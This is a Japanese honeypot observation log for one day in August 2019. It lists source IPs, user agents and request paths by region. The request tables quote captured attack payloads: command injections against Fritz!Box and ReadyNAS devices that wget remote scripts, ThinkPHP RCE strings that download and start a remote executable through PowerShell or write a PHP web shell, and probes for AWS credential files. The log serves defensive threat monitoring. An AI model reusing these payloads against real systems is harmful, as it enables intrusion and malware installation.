ハニーポット(仮) 観測記録 2019/08/11分です。
特徴
Region:AP
AVM Fritz!boxの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
awsのcredential情報に対するスキャン行為
masscanでのスキャン行為
110[.]249[.]212[.]46に関する不正通信
を確認しました。
Region:US
ReadyNAS Surveillanceの脆弱性を狙うアクセス
を確認しました。
Region:EU
ThinkPHPの脆弱性を狙うアクセス
awsのcredential情報に対するスキャン行為
masscanでのスキャン行為
を確認しました。
他
アクセス数推移
AP:総アクセス数:31 (前日比:-18)
US:総アクセス数:12 (前日比:-18)
EU:総アクセス数:33 (前日比:+24)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Region:AP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
3 | 110.249.212.46 | China |
4 | 183.131.18.170 | China |
5 | 185.100.87.250 | Romania |
1 | 185.39.89.101 | Germany |
1 | 209.141.43.244 | United States |
3 | 5.8.10.202 | Russia |
1 | 61.110.186.68 | South Korea |
1 | 61.219.11.153 | Taiwan |
1 | 66.249.71.121 | United States |
1 | 66.249.75.57 | United States |
3 | 77.247.110.165 | Netherlands |
3 | 77.247.110.69 | Netherlands |
1 | 89.248.174.144 | Netherlands |
3 | 91.121.209.213 | France |
UserAgent一覧
件数 | UserAgent |
---|---|
12 | - |
4 | Go-http-client/1.1 |
3 | masscan/1.0 (https://github.com/robertdavidgraham/masscan) |
2 | Mozilla/5.0 |
2 | Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) |
5 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 |
3 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
1 | GET | /admin-console/login.seam | HTTP/1.1\n |
1 | GET | /.aws/credentials | HTTP/1.0 |
2 | GET | /.aws/credentials | HTTP/1.1 |
1 | GET | /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20wget%20http://91[.]92[.]66[.]192/xd.sh%20%26 | HTTP/1.1 |
1 | GET | /evox/about | HTTP/1.1] |
1 | GET | /HNAP1 | HTTP/1.1 |
3 | GET | http://110[.]249[.]212[.]46/testget?q=23333&port=80 | HTTP/1.1 |
1 | GET | /nmaplowercheck1565401025 | HTTP/1.1 |
2 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /shell?busybox | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /webadmin/script?command= | busybox|HTTP/1.1 |
3 | HEAD | /acadmin.php | HTTP/1.1 |
1 | HEAD | / | HTTP/1.1 |
2 | HEAD | /robots.txt | HTTP/1.0 |
4 | HEAD | /robots.txt | HTTP/1.1 |
1 | POST | /sdk | HTTP/1.1 |
1 | POST | /TP/index.php?s=captcha | HTTP/1.1 |
Region:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 112.3.28.71 | China |
5 | 185.100.87.246 | Romania |
1 | 195.29.90.142 | Croatia |
1 | 54.39.209.227 | Canada |
1 | 5.8.10.202 | Russia |
1 | 61.219.11.153 | Taiwan |
1 | 77.247.110.165 | Netherlands |
1 | 77.247.110.69 | Netherlands |
UserAgent一覧
件数 | UserAgent |
---|---|
5 | - |
1 | Go-http-client/1.1 |
1 | Mozilla/5.0 |
5 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
1 | GET | /evox/about | HTTP/1.1 |
1 | GET | /HNAP1 | HTTP/1.1 |
1 | GET | /nmaplowercheck1565399584 | HTTP/1.1 |
1 | GET | /shell?busybox | HTTP/1.1 |
1 | GET | /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;wget http://185[.]164[.]72[.]155/richard; | |
1 | GET | /xmlrpc.php | HTTP/1.1 |
1 | HEAD | /acadmin.php | HTTP/1.1 |
1 | HEAD | / | HTTP/1.1 |
2 | HEAD | /robots.txt | HTTP/1.0 |
1 | POST | /sdk | HTTP/1.1 |
Region:EU
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 112.3.28.71 | China |
3 | 180.166.58.2 | China |
10 | 183.131.18.169 | China |
1 | 183.251.100.145 | China |
4 | 183.251.100.146 | China |
1 | 183.251.100.147 | China |
4 | 183.251.100.148 | China |
4 | 209.141.53.82 | United States |
1 | 5.8.10.202 | Russia |
1 | 61.219.11.153 | Taiwan |
1 | 77.247.110.165 | Netherlands |
1 | 77.247.110.69 | Netherlands |
1 | 91.121.209.213 | France |
UserAgent一覧
件数 | UserAgent |
---|---|
8 | - |
3 | Go-http-client/1.1 |
1 | masscan/1.0 (https://github.com/robertdavidgraham/masscan) |
3 | Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) |
18 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
1 | GET | /.aws/credentials | HTTP/1.0 |
2 | GET | /elrekt.php | HTTP/1.1 |
2 | GET | /html/public/index.php | HTTP/1.1 |
2 | GET | /index.php | HTTP/1.1 |
2 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /myadmin/scripts/setup.php | HTTP/1.1\n |
1 | GET | /phpmyadmin2/scripts/setup.php | HTTP/1.1\n |
1 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1\n |
1 | GET | /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://wiu[.]fxxxxxxk[.]me/download.exe','%SystemRoot%/Temp/gniskhechzvynsu22693.exe');start%20%SystemRoot%/Temp/gniskhechzvynsu22693.exe | HTTP/1.1 |
2 | GET | /public/index.php | HTTP/1.1 |
1 | GET | /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://wiu[.]fxxxxxxk[.]me/download.exe','%SystemRoot%/Temp/gniskhechzvynsu22693.exe');start%20%SystemRoot%/Temp/gniskhechzvynsu22693.exe | HTTP/1.1 |
1 | GET | /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php | HTTP/1.1 |
1 | GET | /scripts/setup.php | HTTP/1.1\n |
2 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
2 | GET | /TP/html/public/index.php | HTTP/1.1 |
2 | GET | /TP/index.php | HTTP/1.1 |
2 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /xmlrpc.php | HTTP/1.1 |
1 | HEAD | /acadmin.php | HTTP/1.1 |
2 | HEAD | /robots.txt | HTTP/1.0 |
2 | POST | /index.php?s=captcha | HTTP/1.1 |